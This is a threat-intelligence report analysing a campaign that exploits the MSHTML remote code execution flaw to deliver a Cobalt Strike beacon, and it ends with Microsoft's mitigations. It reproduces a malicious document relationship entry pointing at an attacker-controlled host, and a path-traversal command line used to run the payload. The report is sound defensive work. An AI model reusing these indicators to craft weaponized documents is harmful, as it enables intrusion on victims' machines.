Following several attacks targeting the RCE flaw in MSHTML, CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence.
MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, which is being abused by threat actors to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML. These malicious documents are delivered via Office 365. By default, the documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user continues to download the content bypassing the mitigation measures, the target machine will be exploited, and malware agents such as CobaltStrike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign. CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain as a large number of systems continue to be susceptible.
Microsoft Word/ Excel documents are an archived collection of XML files that retain the information and data provided by the user while creating the document on corresponding Office applications. In simple words, one can easily unzip the doc files to see internal XML files that contain various metadata. The directory “word_rels” in unzipped Word/ Excel files plays a very significant role in weaponizing a seemingly benign document.
The process by which the users’ are attacked via Trident vulnerability
The directory ‘_rels’ stores relationship metadata which helps to fetch the template used by the document when it gets loaded by Office. An SMB address or HTTP URL of the asset controlled by the attacker can be provided to execute the malicious payload. For the remote template injection vector, we need to search for XML attributes, for which the TargetMode is set to ”External”. In this case, we could search for a malicious URL to exploit the code provided as a value to the attribute, where is external. Office, then, downloads the specific file that the particular URL points to.
<?** **xml version=** **"1.0"** **encoding=** **"UTF-8"** **standalone=** **"true"** **?> -< Relationships xmlns = “http://schemas.openxmlformats.org/package/2006/relationships” > < Relationship Target = “theme/theme1.xml” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme” Id = “rId8” /> < Relationship Target = “webSettings.xml” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings” Id = “rId3” /> < Relationship Target = “fontTable.xml” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable” Id = “rId7” /> < Relationship Target = “settings.xml” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings” Id = “rId2” /> < Relationship Target = “styles.xml” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles” Id = “rId1” /> < Relationship Target = “mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject” Id = “rId6” TargetMode = “External” /> < Relationship Target = “media/image2.wmf” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/image” Id = “rId5” /> < Relationship Target = “media/image1.jpeg” Type = “http://schemas.openxmlformats.org/officeDocument/2006/relationships/image” Id = “rId4” /> </ Relationships >
Remote template injection used in obtained Trident campaign samples The malicious docx sample, when executed, loads a webpage named ‘side.html’ , hosted on an attacker-controlled server via remote template injection. Since the campaign targets the MSHTML engine supported on Office platforms, loading the HTML document occurs naturally.
HTML contents of the malicious webpage ‘side.html’
A section of the deobfuscated exploit code
The cabinet file is retrieved from a remote URL, and the INF file gets stored in one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as ‘champion.inf’.
A section of the deobfuscated exploit code
The cpl payload ‘ champion.inf ’, is eventually executed by ‘ rundll32.exe’ with the following command: ’ .cpl:…/…/…/AppData/Local/Temp/Low/championship.inf ’
A basic image analysis shows that the ‘champion.inf’ file is, in fact, a 64-bit DLL (Dynamic Link Library) and its first bytes text is “MZ.” The CPL file is a control panel item that has code execution capabilities. A DLL becomes CPL when it exports a particular function called ‘CplApplet’ , which can be readily executed like a PE (Portable Executable).
Image analysis of ‘ Champion.inf ‘
Windows Defender flags this as “ Trojan: Win32/Agent.SA" , and the other security solutions flag it as “ Trojan.Win64.COBEACON.SUZ ."
When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result of the code execution is a Cobalt Strike beacon as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found few interesting results that are shared below.
Microsoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files.
Windows Directory DLL files
Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via Remote Template Injection, the handler provided in the attribute is mhtml. This leads to loading the mshtml module into the Word application to render the HTML page within the Word document.
Final payload championship.inf is extracted from the initial ministry.cab archive file and is written to the Temp directory. This is probably caused by the vulnerability which is abused by adversaries to write user-controlled data on the file disk.
CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes search for the champion.inf file in directories that are hardcoded in the exploit. Here’s a list of the hardcoded directories to which the payload is dropped.
The command lines provided to control.exe are shown in the image provided below. The argument provided is the location of the final payload and it is eventually executed by rundll32.
Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
- Disable ActiveX via Group Policy*
- Disable ActiveX on individual systems via registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should select the detection build 1.349.22.0
*Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.